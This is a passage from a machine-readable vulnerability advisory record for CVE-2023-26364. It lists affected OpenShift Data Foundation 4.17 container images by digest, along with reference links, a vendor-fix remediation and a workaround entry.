"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26364"
},
{
"category": "external",
"summary": "RHBZ#2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26364",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26364"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364"
},
{
"category": "external",
"summary": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg",
"url": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg"
}
],
"release_date": "2023-11-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "No mitigation is yet available for this vulnerability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
